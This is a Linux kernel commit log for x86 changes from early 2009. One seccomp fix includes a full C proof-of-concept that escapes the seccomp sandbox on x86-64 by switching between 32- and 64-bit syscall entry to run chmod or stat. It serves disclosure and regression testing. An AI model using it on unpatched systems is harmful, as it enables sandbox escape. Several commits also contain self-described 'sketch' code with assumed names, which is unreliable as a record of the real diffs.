1. 11 Mar 2009, 1 commit
  2. 07 Mar 2009, 1 commit
    • x86: linkage.h - guard assembler specifics by __ASSEMBLY__ · 7ab15247
      Cyrill Gorcunov authored
      Stephen Rothwell reported:
      
      |Today's linux-next build (x86_64 allmodconfig) produced this warning:
      |
      |In file included from drivers/char/epca.c:49:
      |drivers/char/digiFep1.h:7:1: warning: "GLOBAL" redefined
      |In file included from include/linux/linkage.h:5,
      |                 from include/linux/kernel.h:11,
      |                 from arch/x86/include/asm/system.h:10,
      |                 from arch/x86/include/asm/processor.h:17,
      |                 from include/linux/prefetch.h:14,
      |                 from include/linux/list.h:6,
      |                 from include/linux/module.h:9,
      |                 from drivers/char/epca.c:29:
      |arch/x86/include/asm/linkage.h:55:1: warning: this is the location of the previous definition
      |
      |Probably introduced by commit 95695547
      |("x86: asm linkage - introduce GLOBAL macro") from the x86 tree.
      
      Any assembler-specific snippets placed in headers must be
      protected by __ASSEMBLY__. Fixed.
      
      Also move the __ALIGN definition under the same protection.
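      
      A minimal sketch of the resulting guard (illustrative, not the
      exact diff; GLOBAL and __ALIGN are the macros named above):
      
      	/* arch/x86/include/asm/linkage.h (sketch) */
      	#ifdef __ASSEMBLY__
      
      	/* visible only to .S files, so C units such as epca.c can
      	   define their own GLOBAL without a redefinition warning */
      	#define GLOBAL(name)	\
      		.globl name;	\
      		name:
      
      	#define __ALIGN		.align 16,0x90
      
      	#endif /* __ASSEMBLY__ */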
      Reported-by: Stephen Rothwell <sfr@canb.auug.org.au>
      Signed-off-by: Cyrill Gorcunov <gorcunov@openvz.org>
      LKML-Reference: <20090306160833.GB7420@localhost>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
  3. 05 Mar 2009, 9 commits
  4. 04 Mar 2009, 1 commit
  5. 03 Mar 2009, 2 commits
    • x86: set_highmem_pages_init() cleanup · 867c5b52
      Pekka Enberg authored
      Impact: cleanup
      
      This patch moves set_highmem_pages_init() to arch/x86/mm/highmem_32.c.
      
      The function's declaration is kept in asm/numa_32.h because
      asm/highmem.h is included only when CONFIG_HIGHMEM is enabled, so
      the empty static inline stub for the !CONFIG_HIGHMEM case cannot
      live there.
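      
      A hedged sketch of the header arrangement just described (shape
      only, not the exact hunk):
      
      	/* arch/x86/include/asm/numa_32.h (sketch) */
      	#ifdef CONFIG_HIGHMEM
      	extern void set_highmem_pages_init(void);
      	#else
      	static inline void set_highmem_pages_init(void) { }
      	#endif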
      Signed-off-by: Pekka Enberg <penberg@cs.helsinki.fi>
      LKML-Reference: <1236082212.2675.24.camel@penberg-laptop>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath authored
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process makes a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
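      
      A hedged sketch of the fix's shape (simplified; the helper name and
      placement are assumptions, not the literal diff). The point is to
      key off the per-entry TS_COMPAT status, which reflects how the
      current system call was made, rather than the per-process TIF_IA32
      flag:
      
      	/* kernel/seccomp.c (sketch) */
      	static int seccomp_is_compat(void)	/* name assumed */
      	{
      		return current_thread_info()->status & TS_COMPAT;
      	}
      
      	void __secure_computing(int this_syscall)
      	{
      		int *syscall = mode1_syscalls;
      
      		if (seccomp_is_compat())
      			syscall = mode1_syscalls_32;
      		do {
      			if (*syscall == this_syscall)
      				return;		/* allowed */
      		} while (*++syscall);
      		do_exit(SIGKILL);		/* anything else dies */
      	}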
      Signed-off-by: Roland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
  6. 02 Mar 2009, 5 commits
    • xen: deal with virtually mapped percpu data · 9976b39b
      Jeremy Fitzhardinge authored
      The virtually mapped percpu space causes us two problems:
      
       - for hypercalls which take an mfn, we need to do a full pagetable
         walk to convert the percpu va into an mfn, and
      
       - when a hypercall requires a page to be mapped RO via all its aliases,
         we need to make sure it's RO in both the percpu mapping and in the
         linear mapping
      
      This primarily affects the gdt and the vcpu info structure.
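      
      A minimal sketch of the first point, assuming the Xen helper
      arbitrary_virt_to_machine() (a full pagetable walk) is the
      conversion primitive in play:
      
      	/* virt_to_mfn() assumes the linear map, so it is unsafe for
      	   a virtually mapped percpu address; walk the pagetables. */
      	static unsigned long percpu_va_to_mfn(void *v)	/* name assumed */
      	{
      		return PFN_DOWN(arbitrary_virt_to_machine(v).maddr);
      	}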
      Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Cc: Xen-devel <xen-devel@lists.xensource.com>
      Cc: Gerd Hoffmann <kraxel@redhat.com>
      Cc: Rusty Russell <rusty@rustcorp.com.au>
      Cc: Tejun Heo <htejun@gmail.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86: add forward decl for tss_struct · 2fb6b2a0
      Jeremy Fitzhardinge authored
      It's the correct thing to do before using the struct in a prototype.
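      
      For illustration (the prototype below is a stand-in, not a line
      from the patch):
      
      	struct tss_struct;			/* forward declaration */
      	void uses_tss(struct tss_struct *tss);	/* hypothetical user */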
      Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86: unify chunks of kernel/process*.c · 389d1fb1
      Jeremy Fitzhardinge authored
      With x86-32 and -64 using the same mechanism for managing the
      tss io permissions bitmap, large chunks of process*.c are
      trivially unifiable, including:
      
       - exit_thread
       - flush_thread
       - __switch_to_xtra (along with tsc enable/disable)
      
      and as bonus pickups:
      
       - sys_fork
       - sys_vfork
      
      (Note: asmlinkage expands to empty on x86-64)
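      
      A hedged sketch of what one such unified chunk can look like
      (shape only; the asmlinkage note above is what lets one C body
      serve both 32- and 64-bit):
      
      	/* kernel/process.c (sketch) */
      	asmlinkage int sys_fork(struct pt_regs *regs)
      	{
      		return do_fork(SIGCHLD, regs->sp, regs, 0, NULL, NULL);
      	}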
      Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86-32: use non-lazy io bitmap context switching · db949bba
      Jeremy Fitzhardinge authored
      Impact: remove 32-bit optimization to prepare unification
      
      x86-32 and -64 differ in the way they context-switch tasks
      with io permission bitmaps.  x86-64 simply copies the next
      tasks io bitmap into place (if any) on context switch.  x86-32
      invalidates the bitmap on context switch, so that the next
      IO instruction will fault; at that point it installs the
      appropriate IO bitmap.
      
      This makes context switching between IO-bitmap-using tasks a bit
      less expensive, at the cost of making the next IO instruction
      slower due to the extra fault.  This tradeoff only makes sense
      if IO-bitmap-using processes are relatively common, but they
      don't actually use IO instructions very often.
      
      However, in a typical desktop system, the only process likely
      to be using IO bitmaps is the X server, and on a server nothing
      uses them at all.  Therefore the lazy context switch doesn't
      really win all that much, and it's just a gratuitous difference
      from the 64-bit code.
      
      This patch removes the lazy context switch, with a view to
      unifying this code in a later change.
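      
      A hedged sketch of the non-lazy scheme being adopted (modeled on
      the 64-bit behaviour described above; simplified from the real
      __switch_to path):
      
      	if (next->io_bitmap_ptr) {
      		/* copy the incoming task's bitmap into the TSS */
      		memcpy(tss->io_bitmap, next->io_bitmap_ptr,
      		       max(prev->io_bitmap_max, next->io_bitmap_max));
      	} else if (prev->io_bitmap_ptr) {
      		/* no bitmap: mark the TSS copy invalid so any IO
      		   instruction by 'next' faults with #GP */
      		memset(tss->io_bitmap, 0xff, prev->io_bitmap_max);
      	}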
      Signed-off-by: Jeremy Fitzhardinge <jeremy.fitzhardinge@citrix.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86, mm: don't use non-temporal stores in pagecache accesses · f1800536
      Ingo Molnar authored
      Impact: standardize IO on cached ops
      
      On modern CPUs it is almost always a bad idea to use non-temporal
      stores, as the regression addressed by this commit has shown:
      
        30d697fa: x86: fix performance regression in write() syscall
      
      The kernel simply has no good information about whether using non-temporal
      stores is a good idea or not - and trying to add heuristics only increases
      complexity and inserts fragility.
      
      The regression on cached write()s took very long to find - over two
      years. So don't take any chances and let the hardware decide how it
      makes use of its caches.
      
      The only exception is drivers/gpu/drm/i915/i915_gem.c: there we are
      absolutely sure that another entity (the GPU) will pick up the dirty
      data immediately and that the CPU will not touch that data before
      the GPU does.
      
      Also, keep the _nocache() primitives to make it easier for people to
      experiment with these details. There may be more clear-cut cases where
      non-cached copies can be used, outside of filemap.c.
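      
      For reference, a hedged illustration of the kind of _nocache()
      call that stays (the shape of the i915 case above, not the
      literal code):
      
      	/* destination is GPU memory the CPU never reads back, so
      	   bypassing the cache is a clear win here */
      	unwritten = __copy_from_user_inatomic_nocache(vaddr + offset,
      						      user_data, len);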
      
      Cc: Salman Qazi <sqazi@google.com>
      Cc: Nick Piggin <npiggin@suse.de>
      Cc: Linus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
  7. 01 Mar 2009, 2 commits
    • Revert "gpu/drm, x86, PAT: PAT support for io_mapping_*" · f5c1aa15
      Ingo Molnar authored
      This reverts commit 17581ad8.
      
      Sitsofe Wheeler reported that /dev/dri/card0 is MIA on his EeePC 900
      and bisected it to this commit.
      
      Graphics card is an i915 in an EeePC 900:
      
       00:02.0 VGA compatible controller [0300]:
         Intel Corporation Mobile 915GM/GMS/910GML
           Express Graphics Controller [8086:2592] (rev 04)
      
      ( Most likely the ioremap() of the driver failed and hence the card
        did not initialize. )
      Reported-by: Sitsofe Wheeler <sitsofe@yahoo.com>
      Bisected-by: Sitsofe Wheeler <sitsofe@yahoo.com>
      Cc: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • bootmem, x86: further fixes for arch-specific bootmem wrapping · d0c4f570
      Tejun Heo authored
      Impact: fix new breakages introduced by previous fix
      
      Commit c1329375 tried to clean up the
      bootmem arch wrapper but it wasn't quite correct.  Before the
      commit, the following were broken:
      
      * Low level interface functions prefixed with __ ignored arch
        preference.
      
      * reserve_bootmem(...) can't be mapped into
        reserve_bootmem_node(NODE_DATA(0)->bdata, ...) because the node is
        not a mere preference there: the specified region MUST fall inside
        the specified node; otherwise, it will panic.
      
      After the commit,
      
      * If allocation fails for the arch-preferred node, it should fall
        back to whatever is available.  Instead, it simply failed the
        allocation.
      
      There are too many internal details to allow generic wrapping and
      still keep things simple for archs.  Plus, all that an arch wants
      is a way to prefer a certain node over another.
      
      This patch drops the generic wrapping around alloc_bootmem_core().
      If necessary, an arch can define a bootmem_arch_preferred_node()
      macro or function which takes all the allocation information and
      returns the preferred node.  bootmem generic code will always try
      the preferred node first and then fall back to other nodes as
      usual.
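      
      A hedged sketch of the generic side of that flow (the loop shape
      here is simplified, not the literal patch):
      
      	/* try the arch-preferred node first ... */
      	ptr = alloc_arch_preferred_bootmem(bdata, size, align, goal, limit);
      	if (ptr)
      		return ptr;
      
      	/* ... then fall back to scanning all nodes as usual */
      	list_for_each_entry(bdata, &bdata_list, list) {
      		ptr = alloc_bootmem_core(bdata, size, align, goal, limit);
      		if (ptr)
      			return ptr;
      	}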
      
      Breakages noted and changes reviewed by Johannes Weiner.
      Signed-off-by: Tejun Heo <tj@kernel.org>
      Acked-by: Johannes Weiner <hannes@cmpxchg.org>
  8. 28 Feb 2009, 8 commits
  9. 26 Feb 2009, 4 commits
  10. 25 Feb 2009, 7 commits
    • gpu/drm, x86, PAT: PAT support for io_mapping_* · 17581ad8
      Venkatesh Pallipadi authored
      Make io_mapping_create_wc and io_mapping_free go through PAT to make sure
      that there are no memory type aliases.
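      
      A hedged sketch of the idea (reserve_memtype() is PAT's tracking
      API; the exact call site and flags here are assumptions):
      
      	/* claim the range as WC in the PAT tracker; if it is already
      	   held with a conflicting type, fail rather than alias it */
      	if (reserve_memtype(base, base + size, _PAGE_CACHE_WC, NULL))
      		return NULL;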
      Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com>
      Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: Dave Airlie <airlied@redhat.com>
      Cc: Jesse Barnes <jbarnes@virtuousgeek.org>
      Cc: Eric Anholt <eric@anholt.net>
      Cc: Keith Packard <keithp@keithp.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • gpu/drm, x86, PAT: io_mapping_create_wc and resource_size_t · 4ab0d47d
      Venkatesh Pallipadi authored
      io_mapping_create_wc should take a resource_size_t parameter in place
      of unsigned long.  With unsigned long, there is no way to map an
      address above 4GB on 32-bit i386.
      
      Addresses above 4GB cannot be mapped on i386 without PAE, so return
      an error in that case.
      
      The patch also adds an io_mapping structure that saves the base, size
      and type on HAVE_ATOMIC_IOMAP archs, which can be used to verify the
      offset on io_mapping_map calls.
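      
      A hedged sketch of the resulting interface (the field set follows
      the description above; the exact layout is illustrative):
      
      	struct io_mapping {
      		resource_size_t	base;	/* may exceed 4GB with PAE */
      		unsigned long	size;
      		pgprot_t	prot;
      	};
      
      	struct io_mapping *
      	io_mapping_create_wc(resource_size_t base, unsigned long size);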
      Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com>
      Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: Dave Airlie <airlied@redhat.com>
      Cc: Jesse Barnes <jbarnes@virtuousgeek.org>
      Cc: Eric Anholt <eric@anholt.net>
      Cc: Keith Packard <keithp@keithp.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • gpu/drm, x86, PAT: routine to keep identity map in sync · 7880f746
      Venkatesh Pallipadi authored
      Add a function to check and keep the identity map in sync when
      changing any memory type.  One of the follow-on patches will also
      use this routine.
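      
      A sketch of the routine's role (the name below is my reading of
      the patch; treat it as an assumption):
      
      	/* after changing a range's memory type, mirror the change
      	   into the kernel identity map so the two never alias */
      	int kernel_map_sync_memtype(u64 base, unsigned long size,
      				    unsigned long flags);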
      Signed-off-by: Venkatesh Pallipadi <venkatesh.pallipadi@intel.com>
      Signed-off-by: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: Dave Airlie <airlied@redhat.com>
      Cc: Jesse Barnes <jbarnes@virtuousgeek.org>
      Cc: Eric Anholt <eric@anholt.net>
      Cc: Keith Packard <keithp@keithp.com>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86: usercopy: check for total size when deciding non-temporal cutoff · 95108fa3
      Ingo Molnar authored
      Impact: make more types of copies non-temporal
      
      This change makes the following simple fix:
      
        30d697fa: x86: fix performance regression in write() syscall
      
      a bit more sophisticated: we check the 'total' number of bytes
      written to decide whether to copy in a cached or a non-temporal
      way.
      
      This will for example cause the tail (modulo 4096 bytes) chunk
      of a large write() to be non-temporal too - not just the page-sized
      chunks.
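      
      A hedged sketch of the cutoff (simplified; the PAGE_SIZE threshold
      mirrors the page-sized behaviour described above):
      
      	/* decide on the *total* write, not the current chunk, so the
      	   sub-page tail of a large write() stays non-temporal too */
      	if (total >= PAGE_SIZE)
      		return __copy_user_nocache(dst, src, size, 1);
      	return __copy_from_user(dst, src, size);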
      
      Cc: Salman Qazi <sqazi@google.com>
      Cc: Nick Piggin <npiggin@suse.de>
      Cc: Linus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86, mm: pass in 'total' to __copy_from_user_*nocache() · 3255aa2e
      Ingo Molnar authored
      Impact: cleanup, enable future change
      
      Add a 'total bytes copied' parameter to __copy_from_user_*nocache(),
      and update all the callsites.
      
      The parameter is not used yet - architecture code can use it to
      more intelligently decide whether the copy should be cached or
      non-temporal.
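      
      A sketch of the widened signature (per the description above; the
      exact prototype may differ by architecture):
      
      	int __copy_from_user_nocache(void *dst, const void __user *src,
      				     unsigned size, unsigned long total);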
      
      Cc: Salman Qazi <sqazi@google.com>
      Cc: Nick Piggin <npiggin@suse.de>
      Cc: Linus Torvalds <torvalds@linux-foundation.org>
      Signed-off-by: Ingo Molnar <mingo@elte.hu>
    • x86: convert cacheflush macros to inline functions · d3251005
      Tejun Heo authored
      Impact: cleanup
      
      Unused macro parameters cause spurious unused variable warnings.
      Convert all cacheflush macros to inline functions to avoid the
      warnings and achieve better type checking.
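      
      An illustrative before/after of the conversion (a generic
      cacheflush hook, not necessarily one from this patch):
      
      	/* before: a no-op macro; variables passed to it can look
      	   unused to the compiler and trigger spurious warnings */
      	#define flush_icache_page(vma, pg)	do { } while (0)
      
      	/* after: still a no-op, but the arguments are consumed and
      	   type-checked */
      	static inline void flush_icache_page(struct vm_area_struct *vma,
      					     struct page *page) { }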
      Signed-off-by: Tejun Heo <tj@kernel.org>
    • x86, mce, cmci: add CMCI support · 88ccbedd
      Andi Kleen authored
      Impact: Major new feature
      
      Intel CMCI (Corrected Machine Check Interrupt) is a new
      feature on Nehalem CPUs. It allows the CPU to trigger
      interrupts on corrected events, which allows faster
      reaction to them than the traditional polling timer.
      
      Also use CMCI to discover shared banks. Machine check banks
      can be shared by CPU threads or even cores. Using the CMCI enable
      bit it is possible to detect that another CPU already
      saw a specific bank. Use this to assign shared banks to only
      one CPU to avoid reporting duplicate events.
      
      On CPU hot-unplug, bank sharing is rediscovered. This is done
      using a thread that cycles through all the CPUs.
      
      To avoid races between the poller and CMCI, we only poll
      for banks that are not CMCI-capable, and only check CMCI-owned
      banks on an interrupt.
      
      The shared banks ownership information is currently only used for
      CMCI interrupts, not polled banks.
      
      The sharing discovery code follows the algorithm recommended in
      the IA32 SDM Vol3a 14.5.2.1; a sketch of the probe follows.
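      
      (Hedged sketch; the MSR and bit names are my assumptions about the
      era's code, and the read-back trick is the SDM algorithm cited
      above:)
      
      	/* for each bank: */
      	rdmsrl(MSR_IA32_MC0_CTL2 + bank, val);
      	if (val & CMCI_EN)
      		continue;	/* another CPU already owns this bank */
      	wrmsrl(MSR_IA32_MC0_CTL2 + bank, val | CMCI_EN);
      	rdmsrl(MSR_IA32_MC0_CTL2 + bank, val);
      	if (val & CMCI_EN)
      		__set_bit(bank, owned);	/* the bit stuck: it's ours */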
      
      The CMCI interrupt handler just calls the machine check poller to
      pick up the machine check event that caused the interrupt.
      
      I decided not to implement a separate threshold event like
      the AMD version has, because the threshold is always one currently
      and adding another event didn't seem to add any value.
      
      Some code was inspired by Yunhong Jiang's Xen implementation,
      which was in turn inspired by an earlier CMCI implementation
      by me.
      Signed-off-by: Andi Kleen <ak@linux.intel.com>
      Signed-off-by: H. Peter Anvin <hpa@zytor.com>